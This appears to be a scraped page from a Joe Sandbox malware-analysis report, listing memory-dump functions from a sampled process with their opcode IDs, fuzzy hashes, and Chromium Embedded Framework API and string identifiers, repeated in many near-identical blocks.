                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 98c5707d6e0830c9ddeb49068d82b2b4c75d610491c9a8256c2b7ce4358af33d
                                                                                                                                                                            • Instruction ID: 779f5a60edb9dd0d5aeeb45872b1e39020c86f3f00e2ac5cf23e79495b6726a2
                                                                                                                                                                            • Opcode Fuzzy Hash: 98c5707d6e0830c9ddeb49068d82b2b4c75d610491c9a8256c2b7ce4358af33d
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C715027B09B8289FF21DFB4E4402ADBBB6AB44758F444075DE8D27B59DE38C426C364
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_string_utf16_set
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 255155458-0
                                                                                                                                                                            • Opcode ID: 1e3490bca68b8c3274cbeecc2115020831b9076bd9e81532a15e2d3a86fb5802
                                                                                                                                                                            • Instruction ID: 2ff26b3fe0754207093fbc7e59502c36dfc04c138c09139465881f05b1234cfb
                                                                                                                                                                            • Opcode Fuzzy Hash: 1e3490bca68b8c3274cbeecc2115020831b9076bd9e81532a15e2d3a86fb5802
                                                                                                                                                                            • Instruction Fuzzy Hash: DF616E63B04A8284FF24EBB5D4403BCA7B2AB40B98F998535DE5D57B99CF38D941C320
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_string_utf16_set
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 255155458-0
                                                                                                                                                                            • Opcode ID: 6ace9081bd1f1edd449fb6e0773b42b66ffd3d33c4d8c5aa578f97e1b911971e
                                                                                                                                                                            • Instruction ID: b0ae4c4cc327b25e1d310ae0004c36f574efa4ef52e00ecc4b549d42ebec076d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ace9081bd1f1edd449fb6e0773b42b66ffd3d33c4d8c5aa578f97e1b911971e
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C519223B05A4284FF20ABB1D8402BC77B6BB44BA8F998135DE5D17B95CF38D945C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: 767bc6d2e245786616d4daca169c721c6a8bad88ea9802c6d18b4e830295d1dd
                                                                                                                                                                            • Instruction ID: 13c7f7e616cf4c54aabc7efbefe90643d1374bd588f739bead10ba686f7dd27e
                                                                                                                                                                            • Opcode Fuzzy Hash: 767bc6d2e245786616d4daca169c721c6a8bad88ea9802c6d18b4e830295d1dd
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A416D73618A8691EF60DF29E8507A9F761FB88B88F885031EB8E47A54DF3CD545C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: e303969fec3d2d5919997b4b44b45e4eedf2ec00d32255af54cedc5f9a7ed4b7
                                                                                                                                                                            • Instruction ID: 5b2a3ac21d0aa1fee01425c4077318b5515e563c2b37048067b3cc3137d685fa
                                                                                                                                                                            • Opcode Fuzzy Hash: e303969fec3d2d5919997b4b44b45e4eedf2ec00d32255af54cedc5f9a7ed4b7
                                                                                                                                                                            • Instruction Fuzzy Hash: CE314172718A8281EF64DF25E9507A9E371FF94B89F849031DA8E47668DF3CD445C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: 547f02d0dd405122f301dc5fe4de50b4a8a0f3e08934c717986b7059ad5fe54c
                                                                                                                                                                            • Instruction ID: 34dcf9e86ca22a485989d6b0320bed4448168cfa8ec4f4e2ba5e241d7c6eeac0
                                                                                                                                                                            • Opcode Fuzzy Hash: 547f02d0dd405122f301dc5fe4de50b4a8a0f3e08934c717986b7059ad5fe54c
                                                                                                                                                                            • Instruction Fuzzy Hash: 98314E72618A8281EF64DB25E9503B9E772FF94B88F849031DA8E476A8DF3CD445C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: ce5ae4ba9fe376b65645fd51b03e60113563d6b76bda0864989d9fc94911f9d3
                                                                                                                                                                            • Instruction ID: 6ed997f2d5f58ffbd5e384f0fc898099c86fac96a3d67db9d46669cdbc45c9d4
                                                                                                                                                                            • Opcode Fuzzy Hash: ce5ae4ba9fe376b65645fd51b03e60113563d6b76bda0864989d9fc94911f9d3
                                                                                                                                                                            • Instruction Fuzzy Hash: 8F315272718E8682EF64EF25E8513A9E3B1FB84B88F845031DA8E47664DF3CD544C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: d67b039d8f147884b8b9180440fdd646a933bb02c246324ccbae7ce602d0fc27
                                                                                                                                                                            • Instruction ID: c64451c7039aaf054641f861efedd01069e5824484f91d85c09af1ee36fcd592
                                                                                                                                                                            • Opcode Fuzzy Hash: d67b039d8f147884b8b9180440fdd646a933bb02c246324ccbae7ce602d0fc27
                                                                                                                                                                            • Instruction Fuzzy Hash: 76312F72618A8682EF64EF29E8503ADE371FB94B88F885031DA8E47669DF3CD544C750
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_set
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2786225788-0
                                                                                                                                                                            • Opcode ID: 7197ee378ef0cece509e4b77bb64e0ce9f980a1e7a92a43fd744432bfccf45b7
                                                                                                                                                                            • Instruction ID: 0060cbb6510ff74f4bfeef4a5643e00aad4fbf3eea9d902190ff5166e814e81d
                                                                                                                                                                            • Opcode Fuzzy Hash: 7197ee378ef0cece509e4b77bb64e0ce9f980a1e7a92a43fd744432bfccf45b7
                                                                                                                                                                            • Instruction Fuzzy Hash: F121C866A08B8197E754CB3AE6416A9B360F759798F00A125EF9E53A12DF38F1E4C700
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: d33a2170fbd08e1295aa745bb59190dabb63d073c9f8e86e5b0d8221db3b0f23
                                                                                                                                                                            • Instruction ID: 5b770a5764a52a0977fc1fbdcd47e847f7231771f788dba40c6bc1dd4968243c
                                                                                                                                                                            • Opcode Fuzzy Hash: d33a2170fbd08e1295aa745bb59190dabb63d073c9f8e86e5b0d8221db3b0f23
                                                                                                                                                                            • Instruction Fuzzy Hash: 9FF0A433A1864242EEA4BB61E5913BC6321EB40790FC04431E64E47A9ADF3CE8928310
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_parse_url
                                                                                                                                                                            • String ID: ://
                                                                                                                                                                            • API String ID: 3112977411-1869659232
                                                                                                                                                                            • Opcode ID: 9564580328c3f7003594065606879282fdb7369242f53da2a34e8da0ba52247c
                                                                                                                                                                            • Instruction ID: 70a3ae35957d13e9b136a56ee1abc440e0e836ce10e93c48b98c1694774afa70
                                                                                                                                                                            • Opcode Fuzzy Hash: 9564580328c3f7003594065606879282fdb7369242f53da2a34e8da0ba52247c
                                                                                                                                                                            • Instruction Fuzzy Hash: ECC17132A08A8695EF34EB75E8443A9A372FB84754F804435DA8D07BA9DF3CE595C321
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: ContentSizeUpdate
                                                                                                                                                                            • API String ID: 2864223729-3638871761
                                                                                                                                                                            • Opcode ID: f86edb876135eaae2020f8e938f6b9446a33d57ee3d659bcacc85f9186bf0c32
                                                                                                                                                                            • Instruction ID: c768404ecc3d8f14d9ee735d730d065ef3bcfa388028b52f8272e433fc889ddd
                                                                                                                                                                            • Opcode Fuzzy Hash: f86edb876135eaae2020f8e938f6b9446a33d57ee3d659bcacc85f9186bf0c32
                                                                                                                                                                            • Instruction Fuzzy Hash: 0931A663709A8281EE20EB28E490269E7B1FFC5B94F949531E78D47AB9DF3CC545C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_api_hashcef_initialize
                                                                                                                                                                            • String ID: 11d15b06c9fb87a76f83ad5fe91f22eb03edbef5
                                                                                                                                                                            • API String ID: 1700379448-612978255
                                                                                                                                                                            • Opcode ID: 00777ec401509b1104b8a7025e521847e5b3ae9b9f89e0c9a7ebb204bc8de8d7
                                                                                                                                                                            • Instruction ID: 5215c2e09c90479a92f22f23b60f369b5e2c501b4edfc692434bf64de612c31b
                                                                                                                                                                            • Opcode Fuzzy Hash: 00777ec401509b1104b8a7025e521847e5b3ae9b9f89e0c9a7ebb204bc8de8d7
                                                                                                                                                                            • Instruction Fuzzy Hash: 85314D62A09B8282DE20DF25E440169A7B1FF54FD4B888036EF8D47768DF38D55A8350
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
